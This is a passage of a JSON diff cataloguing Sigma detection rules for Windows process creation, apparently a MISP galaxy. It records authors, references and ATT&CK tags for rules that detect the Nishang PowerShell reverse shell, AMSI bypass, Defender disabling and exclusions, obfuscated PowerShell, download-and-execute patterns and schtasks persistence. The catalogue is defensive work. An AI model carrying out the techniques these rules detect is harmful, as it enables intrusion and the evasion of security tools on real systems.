Spawning Windows Shell" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate" + }, + { + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", + "meta": { + "author": "Jason Lynch", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" + ] + }, + "uuid": 
"aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir" + }, + { + "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/13", + "falsepositive": [ + "Legitimate usage of office automation via scripting" + ], + "filename": "proc_creation_win_office_svchost_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", + "https://github.com/med0x2e/vba2clr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "value": "Svchost Spawning Office Application" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2022/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_outlook_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", + "value": "Microsoft Outlook Product Spawning Windows Shell" + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner" + }, + { + "description": "Detect use of PDQ Deploy remote admin tool", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_pdq_deploy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "value": "Use of PDQ Deploy Remote 
Adminstartion Tool" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_persistence_typed_paths.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "value": "Pingback Backdoor" + }, + { + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/12", + "falsepositive": [ + 
"Unknown" + ], + "filename": "proc_creation_win_plugx_susp_exe_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" + ], + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", + "value": "Executable Used by PlugX in Uncommon Location" + }, + { + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "value": "Possible Privilege Escalation via Service Permissions Weakness" + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_amsi_bypass.yml", + 
"level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection" + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_powershell_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_b64_shellcode.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "value": "PowerShell Base64 Encoded Shellcode" + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline" + }, + { + "description": "Detects the PowerShell command lines with special characters", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2022/07/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line" + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_base64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference" + }, + { + "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/03", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_disable_feature.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", + "value": "Powershell Defender Disable Scan Feature" + }, + { + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/29", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion" + }, + { + "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_dll_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "value": "Detection of PowerShell Execution via DLL" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Harish Segar (rule)", + "creation_date": "2020/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_downgrade_attack.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b3512211-c67e-4707-bedc-66efc7848863", + "value": "PowerShell Downgrade Attack" + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL" + }, + { + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/28", + "falsepositive": [ + "Software installers that pull packages from remote systems and execute them" + ], + "filename": "proc_creation_win_powershell_download_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "value": "Suspicious PowerShell Download and Execute Pattern" + }, + { + "description": "Detects suspicious FromBase64String expressions in command line 
arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/29", + "falsepositive": [ + "Administrative script libraries" + ], + "filename": "proc_creation_win_powershell_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ] + }, + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line" + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_get_clipboard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI" + }, + { + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_public_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags" + }, + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder" + }, + { + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "meta": { + "author": "FPT.EagleEye, wagga", + "creation_date": "2021/03/03", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "value": "Powershell Reverse Shell Connection" + }, + { + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM" + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "meta": { + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "creation_date": "2018/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": 
"bb780e0c-16cf-4383-8383-1e5471db6cf9", + "value": "Suspicious XOR Encoded PowerShell Command Line" + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "meta": { + "author": "Markus Neis, @Karneades", + "creation_date": "2018/03/06", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence" + }, + { + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/29", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powertool_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + 
"https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "value": "PowerTool Execution" + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation" + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": 